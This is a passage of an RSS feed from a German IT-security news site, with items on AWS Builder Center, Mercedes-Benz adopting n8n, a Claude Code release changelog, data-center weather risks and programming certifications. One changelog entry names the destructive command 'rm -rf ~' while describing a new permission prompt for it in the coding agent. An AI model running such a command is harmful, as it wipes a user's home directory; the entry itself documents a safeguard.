<title><![CDATA[AWS Weekly Roundup: AWS Builder Center at 1 year, Network Scanning in Security Hub, Loom for AWS, and more (July 13, 2026)]]></title>
<description><![CDATA[AWS Builder Center turned one year old last week. Launched on July 9, 2025, the platform has grown from a community hub with Wishlist voting, community profiles, and a toolbox into a full ecosystem with sandbox environments, workshops, Spaces, and a Builders’ Library. To mark the anniversary, Ric...]]></description>
<link>https://tsecurity.de/de/3667461/ai-nachrichten/aws-weekly-roundup-aws-builder-center-at-1-year-network-scanning-in-security-hub-loom-for-aws-and-more-july-13-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667461/ai-nachrichten/aws-weekly-roundup-aws-builder-center-at-1-year-network-scanning-in-security-hub-loom-for-aws-and-more-july-13-2026/</guid>
<pubDate>Tue, 14 Jul 2026 11:33:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AWS Builder Center turned one year old last week. Launched on July 9, 2025, the platform has grown from a community hub with Wishlist voting, community profiles, and a toolbox into a full ecosystem with sandbox environments, workshops, Spaces, and a Builders’ Library. To mark the anniversary, Rick Suttles published a full feature timeline covering […]]]></content:encoded>
</item>
<item>
<title><![CDATA[So skaliert Mercedes-Benz die KI-gestützte Automatisierung]]></title>
<description><![CDATA[Mercedes-Benz integriert KI-Automatisierung in seine Kernprozesse.
Mercedes-Benz



Digital First ist bei Mercedes-Benz schon lange keine graue Theorie mehr, sondern gelebte Strategie, wie uns ein Besuch im Digital Factory Campus Berlin zeigte. Jetzt will der Autobauer den nächsten Schritt bei de...]]></description>
<link>https://tsecurity.de/de/3666826/it-security-nachrichten/so-skaliert-mercedes-benz-die-ki-gestuetzte-automatisierung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666826/it-security-nachrichten/so-skaliert-mercedes-benz-die-ki-gestuetzte-automatisierung/</guid>
<pubDate>Tue, 14 Jul 2026 06:05:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/26C0155_001_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AI" class="wp-image-4196177" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Mercedes-Benz integriert KI-Automatisierung in seine Kernprozesse.</p>
</figcaption></figure><p class="imageCredit">Mercedes-Benz</p></div>



<p class="wp-block-paragraph"><a href="https://group.mercedes-benz.com/unternehmen/produktion/produktionsnetzwerk/digital-first.html">Digital First</a> ist bei Mercedes-Benz schon lange keine graue Theorie mehr, sondern gelebte Strategie, wie uns ein <a href="https://www.computerwoche.de/article/3850468/mercedes-setzt-auf-humanoide-und-ki-in-der-digitalen-fabrik.html?utm=hybrid_search">Besuch im Digital Factory Campus Berlin</a> zeigte. Jetzt will der Autobauer den nächsten Schritt bei der Skalierung von Künstlicher Intelligenz gehen: Gemeinsam mit dem deutschen Low-Code-Spezialisten n8n führt das Unternehmen eine globale Plattform ein, mit der Beschäftigte eigene KI-gestützte Workflows entwickeln und direkt in operative Prozesse integrieren können.  </p>



<p class="wp-block-paragraph">Das Unicorn n8n offeriert eine KI-gestützte Open-Source-Plattform für Workflow-Automatisierung. Sie ermöglicht es Unternehmen, tägliche Prozesse durch KI-Agenten effizient zu steuern. Seit der Bewertung des Berliner Unternehmens mit fast 2,4 Milliarden Dollar im Jahr 2025 hat n8n seine Marktpräsenz durch strategische <a href="https://www.computerwoche.de/article/4056375/agentic-ai-made-in-berlin-von-telekom-und-unicorn-n8n.html?utm=hybrid_search">Kooperationen, etwa mit der Telekom</a> zur Unterstützung des Mittelstands in Bereichen wie Logistik und Vertrieb, weiter ausgebaut. Aktuell ist n8n, <a href="https://www.telekom.com/de/medien/medieninformationen/detail/n8n-mit-der-telekom-die-ueberholspur-zum-ki-agenten-1105520">so die Telekom</a>, die wertvollste deutsche KI-Firma mit einer Bewertung von 5,2 Milliarden Euro.</p>



<h2 class="wp-block-heading">KI in Business-Alltag integrieren</h2>



<p class="wp-block-paragraph">Ziel ist es, Daten in Sekundenschnelle nutzbar zu machen. Dazu soll KI-gestützte Automatisierung zum Standard im gesamten Konzern werden. Dahinter steckt die Strategie, die KI-Nutzung von einzelnen Pilotprojekten in zentrale Abläufe im Geschäftsalltag zu überführen. „Wir geben unseren Teams bei Mercedes-Benz die Möglichkeit, Ideen in messbaren Nutzen entlang der Wertschöpfungskette zu übersetzen – und aktiv mitzugestalten, wie wir künftig arbeiten“, so Katrin Lehmann, die zum 1. September ihren Posten als <a href="https://www.cio.de/article/4195932/mercedes-benz-cio-katrin-lehmann-wirft-das-handtuch.html">CIO bei Mercedes-Benz verlässt</a>.</p>



<p class="wp-block-paragraph">Dedizierte KI-Use-Cases hat der Konzern schon genügend entwickelt. Hier sei nur an die eigene LLM-Suite MO360LLM, das Digital Factory Chatbot Ecosystem, das MO360 Multi-Agent-System erinnert – oder die AI Factory als Ideenschmiede für KI-Werkzeuge.</p>



<h2 class="wp-block-heading">Drei Stufen der KI-Kompetenz</h2>



<p class="wp-block-paragraph">Doch der Konzern will mehr. KI- und Automatisierungsanwendungen sollen direkt in den Arbeitsalltag integriert werden. Das Ziel ist es, dass Mitarbeiter KI nicht nur passiv konsumieren, sondern aktiv gestalten. Dabei unterscheidet der Autobauer drei Stufen der KI-Kompetenz:</p>



<ul class="wp-block-list">
<li><strong>Takers:</strong></li>
</ul>



<p class="wp-block-paragraph">Nutzen KI-Tools im täglichen Arbeitsfluss.</p>



<ul class="wp-block-list">
<li><strong>Makers:</strong></li>
</ul>



<p class="wp-block-paragraph">Gestalten mithilfe von Plattformen wie n8n eigene, automatisierte Workflows.</p>



<ul class="wp-block-list">
<li><strong>Builders:</strong></li>
</ul>



<p class="wp-block-paragraph">Entwickeln als Experten hochspezialisierte Softwarelösungen.</p>



<p class="wp-block-paragraph">Zusätzlichen Schub erhielt der konzernweite KI-Rollout durch einen Hackathon. Zu der Veranstaltung kamen mehr als 1.500 Mitarbeiter aus allen Geschäftsbereichen. Ziel war es, eigenständig Ideen für KI- und Automatisierungsanwendungen zu entwickeln. So arbeiten die Teilnehmer an konkreten Anwendungsfällen, um KI und Automatisierung direkt in ihren Arbeitsalltag zu integrieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/26C0155_002_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AI" class="wp-image-4196179" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Mit der Low-Code-Plattform n8n können Teams bei Mercedes-Benz weltweit KI-gestützte Workflows selbst erstellen.</p>
</figcaption></figure><p class="imageCredit">Mercedes-Benz</p></div>



<p class="wp-block-paragraph">Ferner diente der Hackathon dazu, kreative Impulse direkt von den Beschäftigten aufzunehmen und in die Praxis zu überführen. Die besten und stärksten Konzepte aus dem Wettbewerb sollen im Unternehmen umgesetzt werden. So ist geplant, KI-Workflows in allen zentralen Geschäftsbereichen zu implementieren, namentlich in der Entwicklung, Produktion, im Vertrieb sowie in den Bereichen Finanzdienstleistungen, Personal (HR) und IT.</p>



<h2 class="wp-block-heading">Modulare Architektur</h2>



<p class="wp-block-paragraph">Ein weiteres Merkmal der KI-Workflows ist die Verbindung und Koordination über bereits bestehende IT-Systeme hinweg, um komplexe Abläufe zu vereinfachen. Neben klassischen Automatisierungsmethoden werden gezielt neue Ansätze mit KI-Agenten verfolgt. Und last, but not least sollen die Workflows die Teams unterstützen, Probleme schneller zu lösen und Entscheidungen auf der Grundlage von Daten zu treffen.</p>



<p class="wp-block-paragraph">Da Software und KI zu zentralen Wettbewerbsfaktoren in der Industrie werden, setzt Mercedes-Benz auf eine modulare und flexible Technologiearchitektur. Und hier kommt die Plattform von n8n als Teil dieser Architektur in Spiel. Sie fungiert als Low-Code-Plattform, um Teams weltweit in die Lage zu versetzen, KI-Workflows selbst zu erstellen. Ohne tiefgreifende Programmierkenntnisse zu benötigen, sollen die Beschäftig so KI direkt in ihre operativen Prozesse integrieren.</p>



<h2 class="wp-block-heading">Self-Hosting On-Premises</h2>



<p class="wp-block-paragraph">Gleichzeitig dient sie dazu, Workflows über bereits bestehende IT-Systeme hinweg zu orchestrieren. Hierzu verbindet die Plattform diese Systeme, um komplexe Abläufe zu vereinfachen und eine nahtlose Datenverarbeitung zu gewährleisten. Und noch ein Aspekt spricht aus Sicht von Mercedes-Benz für die gewählte Lösung: Die Stärkung der eigenen digitalen Souveränität.</p>



<p class="wp-block-paragraph">So kann n8n selbst gehostet und Cloud-unabhängig betrieben werden. Sprich, die Plattform läuft innerhalb einer gesicherten und Governance-konformen Umgebung des Konzerns. Auf diese Weise behält Mercedes-Benz die volle Kontrolle über kritische Daten und Arbeitsabläufe.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.208]]></title>
<description><![CDATA[What's changed

Added screen reader mode: opt-in plain-text rendering for screen reader users. Run claude --ax-screen-reader, set CLAUDE_AX_SCREEN_READER=1, or add "axScreenReader": true to settings.
Added vimInsertModeRemaps setting: map two-key insert-mode sequences like jj to Escape in vim mod...]]></description>
<link>https://tsecurity.de/de/3666678/downloads/v21208/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666678/downloads/v21208/</guid>
<pubDate>Tue, 14 Jul 2026 03:16:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added screen reader mode: opt-in plain-text rendering for screen reader users. Run <code>claude --ax-screen-reader</code>, set CLAUDE_AX_SCREEN_READER=1, or add "axScreenReader": true to settings.</li>
<li>Added <code>vimInsertModeRemaps</code> setting: map two-key insert-mode sequences like <code>jj</code> to Escape in vim mode</li>
<li>Added <code>CLAUDE_CODE_PROCESS_WRAPPER</code>: agent view and the background service now honor a corporate launcher by running every Claude Code self-spawn through a required wrapper executable</li>
<li>Added mouse-click support for multi-select menus and "Other" input rows in fullscreen mode</li>
<li>Fixed fast mode staying off after switching back to a model that supports it — it now restores automatically when enabled in settings</li>
<li>Fixed replies typed to a background agent being lost when delivery fails — the text is now saved and delivered when the session restarts</li>
<li>Fixed background-session attach failing permanently ("Couldn't start the background daemon") after an update replaced the binary a running <code>claude agents</code> process was launched from</li>
<li>Fixed the context window (and auto-compact indicator) briefly resetting to 200k after the CLI auto-updates, causing a false "100% context used" when resuming long-context sessions</li>
<li>Fixed supervised and background sessions crashing when a server closed an HTTP/2 connection with a GOAWAY while requests were in flight</li>
<li>Fixed truncated stream-json/JSON output and missing result message when piping large responses from <code>claude -p</code></li>
<li>Fixed <code>CLAUDE_CODE_MAX_OUTPUT_TOKENS</code> and similar env vars silently using the mantissa of scientific-notation values (<code>1e6</code> became <code>1</code>)</li>
<li>Fixed very large markdown tables stalling rendering or using excessive memory; tables over 200 rows show the first 200 with a "… N more rows" notice</li>
<li>Fixed the Edit tool failing on files modified after reading when the target text still matches uniquely</li>
<li>Fixed Read reporting empty files as "shorter than offset", Grep silently returning "No files found" for invalid regex patterns, Grep count mode under-reporting totals when paginated, and Glob crashing with an unclear error when the pattern, path, or working directory contained a null byte</li>
<li>Fixed <code>apiKeyHelper</code> script failures being hidden behind a generic 401 after ~10 silent retries; the script's own error is now shown within 3 attempts</li>
<li>Fixed Bedrock streaming requests failing with a misleading "Truncated event message received" when a gateway transforms the response — the error now names the content-type and points at the proxy</li>
<li>Fixed <code>/upgrade</code> showing a login flow instead of the upgrade URL when the browser fails to open</li>
<li>Fixed stream-json input killing the session on blank CRLF or whitespace-only lines from Windows-style SDK hosts</li>
<li>Fixed headless stream-json sessions hanging permanently when a <code>control_request</code> carried a non-string <code>set_model</code> payload; the CLI now answers with an error response</li>
<li>Fixed repeated "No completion record was found" notices on session resume — orphaned background tasks now collapse into a single summary</li>
<li>Fixed Remote Control clients attaching to a terminal-hosted session not seeing background agents and workflow progress until a task started or stopped</li>
<li>Fixed the Agent tool launching with no tools when a subagent's <code>tools</code> list resolves to nothing — it now returns a clear error naming the unrecognized entries</li>
<li>Fixed <code>/usage</code> showing stale cached bars over fresher data, and <code>/mcp</code> not reclassifying placeholder servers after config edits</li>
<li>Fixed "Change directory" in SDK hosts (e.g. Claude Desktop) failing with "A turn is in progress" on idle sessions that have a running background task</li>
<li>Fixed the workflow save dialog showing <code>~/.claude/workflows/</code> instead of the <code>CLAUDE_CONFIG_DIR</code> location for user-scope saves</li>
<li>Fixed <code>/release-notes</code> adding the viewed notes to the model's context — "Show all" previously injected the entire changelog into every subsequent request</li>
<li>Fixed a memory leak in the agent view where pasted images were retained for the screen's lifetime after sending peek replies</li>
<li>Fixed SDK sessions losing agents defined via the initialize request when a plugin refresh ran before the client attached</li>
<li>Fixed several memory leaks in long sessions: MCP stdio server stderr accumulating up to 64 MB per server, LSP documents staying open indefinitely (now LRU with 50-doc cap), async hook output retained after backgrounding, and unbounded growth in headless/SDK sessions from large tool-result payloads</li>
<li>Fixed a memory blowup when reading files with extremely long single lines using offset/limit — the read now returns a clean error instead of loading the whole line</li>
<li>Fixed multi-second per-turn slowdowns in sessions with many permission deny/ask rules — rule matchers are now compiled once and cached</li>
<li>Improved input responsiveness while agent task lists update — task updates no longer re-render the entire UI</li>
<li>Reduced per-tool-call CPU overhead in print/SDK sessions with many MCP tools by caching tool-pool assembly (up to 7x faster tool rounds at high tool counts)</li>
<li>Reduced memory usage by bounding the file edit read cache to 16 MB instead of pinning up to 1,000 full files</li>
<li>Reduced session transcript size (up to 79x in edit-heavy sessions) and bounded checkpoint disk usage by pruning superseded file-history backups</li>
<li>Reduced memory usage when resuming sessions with background agents or forks spawned from large conversations</li>
<li>Completed background agents now stay listed in <code>/tasks</code> until cleanup instead of vanishing the moment they finish</li>
<li>Attaching to a stopped background agent now shows its transcript immediately while the session warms up, instead of a blank "Session is starting" screen</li>
<li>Background sessions: an older daemon no longer silently restarts workers spawned by a newer version onto the older binary</li>
<li>Agent view: Ctrl+X now deletes renamed-branch worktrees, never destroys unpushed commits, keeps the session row when a worktree is kept, and reused worktree names reset to the current base</li>
<li>Catastrophic removals (e.g. <code>rm -rf ~</code>) in commands containing <code>$(…)</code>/backticks/<code>&lt;(…)</code> now prompt in <code>--dangerously-skip-permissions</code> and auto mode, matching the plain form</li>
<li><code>/install-github-app</code> and the <code>/mcp</code> settings menu no longer open in background sessions</li>
<li>MCP servers configured with an empty URL now show as "not configured" in <code>/mcp</code> instead of a config error</li>
<li><code>/usage</code> now shows your last-known usage bars with an "as of" note when the usage endpoint is rate-limited, instead of an error screen</li>
<li>Fixed Bedrock auth failing with "Session token not found or invalid" for AWS SSO profiles whose sso_region differs from the Bedrock region (2.1.207 regression)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weather grows as one of data center growth’s greatest risks]]></title>
<description><![CDATA[AI-driven hyperscale data centers are creating a new generation of risks and challenges that extend well beyond power shortages and chip supply, according to a new report from Zurich North America.



The unprecedented scale, speed and complexity of AI data center construction are exposing the in...]]></description>
<link>https://tsecurity.de/de/3666279/it-security-nachrichten/weather-grows-as-one-of-data-center-growths-greatest-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666279/it-security-nachrichten/weather-grows-as-one-of-data-center-growths-greatest-risks/</guid>
<pubDate>Mon, 13 Jul 2026 21:53:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI-driven hyperscale data centers are creating a new generation of risks and challenges that extend well beyond power shortages and chip supply, according to a new report from Zurich North America.</p>



<p class="wp-block-paragraph">The unprecedented scale, speed and complexity of AI <a href="https://www.networkworld.com/article/4158559/data-centers-are-moving-inland-away-from-some-traditional-locations.html">data center construction</a> are exposing the industry to new threats previously unknown to the older generation of data centers, ranging from severe weather and energy constraints to insurance capacity, labor shortages and geopolitical disruptions, in its report, “<a href="https://www.zurichna.com/media/news-releases/2026/zurich-shares-firsthand-insights-in-data-center-risks-right-now">Data Center Risks Right Now: Six Critical Questions to Enable a Resilient Buildout.</a>”</p>



<p class="wp-block-paragraph">The report states that hyperscalers are prepared to spend an estimated $710 billion in capital expenditures during 2026, and <a href="https://www.youtube.com/watch?v=OjMlcb1U804">global investment in data centers</a> is projected to top $7 trillion by 2030. New capacity added between 2026 and 2030 is expected to total roughly 100 gigawatts, equivalent to the peak electricity demand of about nine New York Cities.</p>



<p class="wp-block-paragraph">Much of that is because these <a href="https://www.networkworld.com/article/4129982/us-pushes-voluntary-pact-to-curb-ai-data-center-energy-impact.html">new data centers</a> are not like any previous generations of  data center development in that modern AI campuses can span up to 20 buildings, consume as much as 2,000 megawatts of electricity and house billions of dollars’ worth of servers and cooling equipment.</p>



<p class="wp-block-paragraph">In addition, <a href="https://www.zurichna.com/knowledge/articles/2026/06/data-centers-through-the-eyes-of-risk-engineers">insurance providers</a> are struggling to keep pace with the massive growth in projected value of these data centers.  Zurich says the average value of the data centers it insured has jumped from roughly $150 million five years ago to about $3 billion today, while the largest campuses can be measured in the tens of billions of dollars.</p>



<p class="wp-block-paragraph">The report cited six areas of concern, the primary of which is growing: severe weather.   Severe weather has surpassed fire as leading construction threat due to changing geography. Zurich states that 64% of U.S. data center capacity currently under construction is located outside traditional markets such as Northern Virginia, in areas are known for bad weather.</p>



<p class="wp-block-paragraph">They include West Texas, Tennessee, Wisconsin and Ohio, where tornadoes, hailstorms and high winds present new hazards. Zurich says severe weather has become the largest source of losses in its U.S. builders-risk portfolio over the past three years, surpassing fire as the industry’s dominant construction threat. Weather accounts for 32% of losses in Zurich’s data center portfolio, followed by fire and equipment damage.</p>



<p class="wp-block-paragraph">The second issue is compressed construction schedules. Operators are increasingly beginning operating portions of a campus where construction is complete and while construction continues elsewhere. That means welding and other, heavy equipment plus incomplete fire protection coexist with active server halls containing sensitive computing equipment.</p>



<p class="wp-block-paragraph">Beyond construction and to absolutely no surprise, Zurich identifies energy infrastructure as one of the defining challenges facing AI expansion. The report notes that U.S. data center electricity demand increased roughly 22% in a single year and is expected to nearly triple to approximately 134 gigawatts by 2030.</p>



<p class="wp-block-paragraph">Likewise, water availability is becoming equally important as power as AI workloads generate more heat and require increasingly sophisticated cooling systems. The report notes that many operators are deploying closed-loop water recycling systems or shifting toward air cooling where possible in a bid to reduce water consumption.</p>



<p class="wp-block-paragraph">Downtime has become more expensive because so much expensive equipment is involved, even minor operational failures can become multimillion-dollar events.</p>



<p class="wp-block-paragraph">The report also warns that replacement equipment often requires months to arrive, citing industry estimates that switchgear may take up to 85 weeks to replace and generators as long as 100 weeks.</p>



<p class="wp-block-paragraph"><a href="https://www.zurichna.com/knowledge/articles/2026/06/the-human-side-of-data-centers">Workforce shortages</a> have raised operational concerns as the AI construction boom is straining the labor market, and they don’t mean The IT staff to run the place, they need people to build it. Zurich cited a report from <a href="https://www.agc.org/">Associated General Contractors of America</a> that 92% of U.S. construction firms are having difficulty finding qualified workers.</p>



<p class="wp-block-paragraph">The report concludes that geopolitical tensions, regulatory scrutiny and emerging technologies will increasingly influence where and how data centers are built. Among the trends Zurich identifies are growing political concern over electricity prices and water consumption, increased reliance on nuclear energy, interest in integrating future quantum computing systems and even early proposals for orbital data centers supported by solar power.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Do programming certifications still matter?]]></title>
<description><![CDATA[If you’re a software developer or architect, you might wonder if programming certifications are still worth the effort, especially in the era of rapid AI-driven evolution. The short answer is, it depends.



“Certifications are shifting from a checkbox to a compass. They’re less about proving you...]]></description>
<link>https://tsecurity.de/de/3665678/ai-nachrichten/do-programming-certifications-still-matter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665678/ai-nachrichten/do-programming-certifications-still-matter/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">If you’re a software developer or architect, you might wonder if programming certifications are still worth the effort, especially in the era of rapid <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html" data-type="link" data-id="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">AI-driven evolution</a>. The short answer is, it depends.</p>



<p class="wp-block-paragraph">“Certifications are shifting from a checkbox to a compass. They’re less about proving you memorized syntax and more about proving you can architect systems, instruct AI coding assistants, and solve problems end-to-end,” says Faizel Khan, lead AI engineer at <a href="https://landingpoint.com/">Landing Point</a>, an executive search and recruiting firm.</p>



<p class="wp-block-paragraph">“In the AI era, fewer students will get trained on the job, which means they have to train themselves,” Khan says. “Certifications—especially architectural ones like AWS, Kubernetes, Terraform—are still the clearest path to do that.”</p>



<h2 class="wp-block-heading">Pros and cons of programming certifications</h2>



<p class="wp-block-paragraph">It’s not all black and white when it comes to deciding whether to pursue programming certifications. The effort involves both pros and cons.</p>



<p class="wp-block-paragraph">“In terms of pros, certifications concretely demonstrate that you have a skillset at a documented level,” says Chris Riccio, vice president of engineering at <a href="https://uplevelteam.com/">Uplevel</a>, an engineering optimization system provider. “They also show that you’ve put in the time and effort to learn, study, and prepare.”</p>



<p class="wp-block-paragraph">Programming certifications are “a useful way to validate foundational skills and show that someone understands core concepts,” says Greg Fuller, vice president of Skillsoft’s training provider, <a href="https://www.codecademy.com/">Codecademy</a>. “They’re especially helpful for people entering the field or shifting from adjacent roles.”</p>



<p class="wp-block-paragraph">Certifications offer a structured path to demonstrate proficiency, and they can confirm your ability to build and deploy in various environments, Fuller says.</p>



<p class="wp-block-paragraph">These types of certifications often demonstrate baseline proficiency and continuous learning, says Reshmi Ramachandran, head of partnerships and GTM strategy for <a href="https://www.cprime.com/">Cprime</a>, a consultancy. “These are often key indications of proficiency for companies looking to filter large candidate pools,” she says.</p>



<p class="wp-block-paragraph">Certifications really do two things, Khan adds. “First, they force you to learn by doing,” he says. “If you’re taking AWS Solutions Architect or Terraform, you don’t pass by guessing—you plan, build, and test systems. That practice matters. Second, they act as a public signal. Think of it like a micro-degree. You’re not just saying, ‘I know cloud.’ You’re showing you’ve crossed a bar that thousands of other engineers recognize.”</p>



<p class="wp-block-paragraph">But there are cons, too. “In tech, employers don’t just want credentials, they want proof you can deliver,” says Kevin Miller, CTO at <a href="https://www.ifs.com/industries/manufacturing/industrial-manufacturing">IFS</a>, a maker of factory automation software. “Programming certifications can be a valuable indicator of your baseline knowledge and competencies, especially if you’re early in your career or pivoting into tech, but their importance is dwindling.”</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/generative-ai/">AI tools</a> that can generate, debug, and optimize code are <a href="https://www.infoworld.com/article/4077352/85-of-developers-use-ai-regularly-jetbrains-survey.html" data-type="link" data-id="https://www.infoworld.com/article/4077352/85-of-developers-use-ai-regularly-jetbrains-survey.html">already performing tasks once done by entry-level developers</a>, “which means fewer traditional programming roles are available,” Miller says. “As a result, the job market is becoming more competitive, and certifications aren’t seen as the noteworthy achievement they once were.”</p>



<p class="wp-block-paragraph">What’s more, not all certifications carry the same weight, Riccio says. “Some may reflect only familiarity rather than true expertise,” he says. “Certifications also often measure ‘book knowledge’ rather than practical experience, and they don’t always map clearly to the requirements of a specific role.”</p>



<p class="wp-block-paragraph">Programming certifications “can be a helpful signal, especially for confirming baseline knowledge in areas like cloud, security, or devops, but they’re not the full picture,” says Morgan Watts, vice president of IT at <a href="https://developer.8x8.com/">8×8</a>, a contact center platform developer.</p>



<p class="wp-block-paragraph">“I’m more interested in a candidate’s attitude and aptitude: what problems they’ve solved, what they’ve built, and how they’ve approached challenges,” Watts says. “Certifications can show commitment and discipline, and they’re especially useful in highly specialized roles. But I’m cautious when someone presents a laundry list of certifications with little evidence of real-world application.”</p>



<p class="wp-block-paragraph">A certification without experience doesn’t carry much weight, Watts says, and over-certification can sometimes signal the wrong focus. “Ultimately, it’s the ability to apply knowledge, collaborate, and adapt that sets great developers apart,” he says.</p>



<p class="wp-block-paragraph">Finally, certifications can age fast, Khan says. “Tech stacks evolve and a badge from two years ago may already feel dusty,” he says. “And some certifications are paper-thin—multiple-choice exams that don’t prove you can debug production at 2 a.m. So, the risk is you collect badges but still can’t ship.”</p>



<h2 class="wp-block-heading">Which certifications will get you noticed?</h2>



<p class="wp-block-paragraph">Despite the drawbacks, certifications are still very much in demand, and some carry more weight than others.</p>



<p class="wp-block-paragraph">The most in-demand certifications are typically platform-based—Amazon Web Services (AWS), Google Cloud Platform (GCP), Microsoft Azure, and others, Riccio says. “Many of these platforms provide managed services that integrate with existing systems or serve as the glue between them,” he says. “Today’s engineering teams aren’t just building standalone systems in isolation; they’re using other systems to store data, orchestrate business workflows, and connect applications.”</p>



<p class="wp-block-paragraph">A certification that demonstrates the ability to build solutions on these platforms can put a development professional ahead of the competition, Riccio says.</p>



<p class="wp-block-paragraph">“The certifications I see in highest demand tend to reflect the evolving tech landscape,” Watts says. “Cloud certifications from AWS, Azure, and GCP are incredibly valuable, especially as distributed systems become the norm.”</p>



<p class="wp-block-paragraph">Also in demand are certifications for <a href="https://www.infoworld.com/article/3632270/the-devops-certifications-tech-companies-want.html">devops and CI/CD tools</a> including <a href="https://www.infoworld.com/article/3529526/how-to-succeed-with-kubernetes.html">Kubernetes</a>, <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker</a>, and <a href="https://www.infoworld.com/article/2260091/what-is-jenkins-the-ci-server-explained.html">Jenkins</a>, Watts says, “because deployment automation and reliability are critical at scale. Also, with AI reshaping development, we’re seeing growing interest in certifications around machine learning, data science, and AI model integration. These certifications stand out because they align directly with the skills that teams need to move faster and more intelligently.”</p>



<aside class="sidebar large">
<h3>More about developer certifications</h3>
<p>Learn more about developer courses and certifications tech companies want:</p>
<ul>
<li><a href="https://www.infoworld.com/article/4055032/ai-developer-certifications-tech-companies-want.html">AI developer certifications</a></li>
<li><a href="https://www.infoworld.com/article/3583466/the-machine-learning-certifications-tech-companies-want.html">Machine learning certifications</a></li>
<li><a href="https://www.infoworld.com/article/2337635/4-cloud-certifications-that-will-help-you-stand-out.html">Cloud development certifications</a></li>
<li><a href="https://www.infoworld.com/article/3632270/the-devops-certifications-tech-companies-want.html">Devops and CI/CD certifications</a></li>
</ul>
</aside>




<p class="wp-block-paragraph">On the AI front, certifications in <a href="https://www.infoworld.com/article/2255099/what-is-tensorflow-the-machine-learning-library-explained.html">TensorFlow</a> and other <a href="https://www.infoworld.com/article/3583466/the-machine-learning-certifications-tech-companies-want.html">machine learning platforms</a> are gaining traction as organizations look to embed AI across the development process, Watts says. “These are the certifications that align closely with where modern engineering is headed—scalable, secure, and AI-enabled,” he says.</p>



<p class="wp-block-paragraph">And then there are <a href="https://www.csoonline.com/article/3970107/the-14-most-valuable-cybersecurity-certifications.html">cybersecurity credentials</a> that continue to be in high demand. Security certifications, such as CompTIA Security+ or Certified Ethical Hacker, “have become essential as every company faces increasing cyber threats and compliance requirements,” Miller says.</p>



<p class="wp-block-paragraph">“Core programming certifications are still a bit niche, but the adjacent skills, like those that help developers deploy, secure, and scale their code, are driving demand,” Fuller says. “Companies want developers who understand the full lifecycle, not just how to write code.”</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3980325/the-java-certifications-tech-companies-want.html">The best Java certifications for software developers</a>.</strong></p>



<h2 class="wp-block-heading">Certifications in the hiring process</h2>



<p class="wp-block-paragraph">Experts are clear that programming certifications alone will not get you the job. But they do play a role in the hiring process.</p>



<p class="wp-block-paragraph">“The information technology world is characterized by rapid and continuous evolution, including the skills and knowledge required to work in the field,” says Diane Rafferty, managing director of the National Technology Group at <a href="https://www.atriumglobal.com/">Atrium</a>, a global talent solutions and extended workforce management firm.</p>



<p class="wp-block-paragraph">“Certifications not only prove that you have the skills and knowledge needed, but they also show employers that you’re invested in your education and career growth,” Rafferty says. “They can give you a competitive edge when looking for a job, as many companies now require candidates to have them.”</p>



<p class="wp-block-paragraph">Certifications are one part of the hiring equation, “but never the only part,” Watts says. “They help validate that a candidate has taken the time to build foundational knowledge, and that’s a good sign. But I put more weight on how a person thinks, solves problems, and contributes to the team. I look for people who are curious and proactive, who are learning because they want to, not just because a course told them to.”</p>



<p class="wp-block-paragraph">Certifications can also play a valuable role in retention, Watts says. “I encourage team members to pursue growth, and when they invest in their own development, the whole organization benefits,” he says. “But again, it’s that balance of knowledge, attitude, and applied experience that really moves the needle.”</p>



<p class="wp-block-paragraph">Certifications “may allow you to breeze through the initial résumé screening process, potentially getting you to the next stage faster,” Riccio says. “At a minimum, they will set your profile apart from the rest of the pack. They also demonstrate that you’ve reached a baseline level of expertise, allowing hiring managers to quickly evaluate whether you have the skills for the role.”</p>



